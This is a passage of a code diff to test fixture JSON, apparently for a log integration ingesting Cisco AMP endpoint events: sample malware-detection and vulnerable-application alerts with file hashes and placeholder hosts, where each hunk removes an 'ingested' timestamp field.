Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -1644,7 +1628,6 @@ ], "code": "1107296272", "id": "15212386047828", - "ingested": "2022-02-02T05:52:24.688960404Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "severity": 3, 
@@ -1726,7 +1709,6 @@ ], "code": "1090519054", "id": "6533669929038643000", - "ingested": "2022-02-02T05:52:24.688961211Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -1816,7 +1798,6 @@ ], "code": "1090519054", "id": "6533669929038643000", - "ingested": "2022-02-02T05:52:24.688962041Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -1902,7 +1883,6 @@ ], "code": "1090519054", "id": "6533669929038643000", - "ingested": "2022-02-02T05:52:24.688962855Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -1988,7 +1968,6 @@ ], "code": "1090519054", "id": "6533669671340605000", - "ingested": "2022-02-02T05:52:24.688963665Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2078,7 +2057,6 @@ ], "code": "1090519054", "id": "6533669671340605000", - "ingested": "2022-02-02T05:52:24.688964469Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2168,7 +2146,6 @@ ], "code": "1090519054", "id": "6533669671340605000", - "ingested": "2022-02-02T05:52:24.688965283Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2254,7 +2231,6 @@ ], "code": "1090519054", "id": "6533669667045638000", - "ingested": "2022-02-02T05:52:24.688966263Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2353,7 +2329,6 @@ ], "code": "1107296279", "id": "15210587194928", - "ingested": "2022-02-02T05:52:24.688967093Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "severity": 1, 
@@ -2434,7 +2409,6 @@ ], "code": "1090519054", "id": "6533669409347600000", - "ingested": "2022-02-02T05:52:24.688967920Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2524,7 +2498,6 @@ ], "code": "1090519054", "id": "6533669409347600000", - "ingested": "2022-02-02T05:52:24.688968731Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2610,7 +2583,6 @@ ], "code": "1090519054", "id": "6533669405052633000", - "ingested": "2022-02-02T05:52:24.688969541Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2696,7 +2668,6 @@ ], "code": "1090519054", "id": "6533669147354595000", - "ingested": "2022-02-02T05:52:24.688970348Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2786,7 +2757,6 @@ ], "code": "1090519054", "id": "6533669147354595000", - "ingested": "2022-02-02T05:52:24.688971154Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2872,7 +2842,6 @@ ], "code": "1090519054", "id": "6533669143059628000", - "ingested": "2022-02-02T05:52:24.688971979Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2958,7 +2927,6 @@ ], "code": "1090519054", "id": "6176259286289613000", - "ingested": "2022-02-02T05:52:24.688972794Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat 